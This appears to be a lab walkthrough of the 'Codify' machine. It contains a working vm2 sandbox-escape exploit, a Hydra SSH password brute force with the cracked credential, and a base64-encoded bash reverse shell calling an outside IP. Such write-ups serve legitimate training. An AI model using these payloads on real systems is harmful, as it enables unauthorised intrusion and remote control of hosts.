Codify

Initial Scan

sudo nmap -T4 -v 10.129.82.199
sudo nmap -T4 -Pn -p 22,80,3000 -sV -sC -v 10.129.82.199 -oA Codify

HTTP

Had to edit the host file to get the Webpage

Checking out their About Us page

Looking around for VM2 CVE's, found this article on snyk about RCE with VM2 after seeing a couple others. Testing the other PoC's I didn't get anywhere until I found this one. We can run commands on the host bypassing the VM.

const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("ls -al").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

console.log(vm.run(code)); // -> hacked

whoami shows us the svc user. Also looking at /etc/passwd we see an additional user, joshua

BruteForce

Trying to run Hydra against the user joshua for a password

hydra -l joshua -P /usr/share/wordlists/rockyou.txt -V ssh://10.129.82.199

joshua:spongebob1

Obtaining shell

Working to get a shall as svc. Looking around for reverse shell, I found PayloadAllTheThings.

bash -i >& /dev/tcp/10.10.14.53/1234 0>&1

Running it normally didn't work so I encoded it

echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash"

Full command

const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

console.log(vm.run(code)); // -> hacked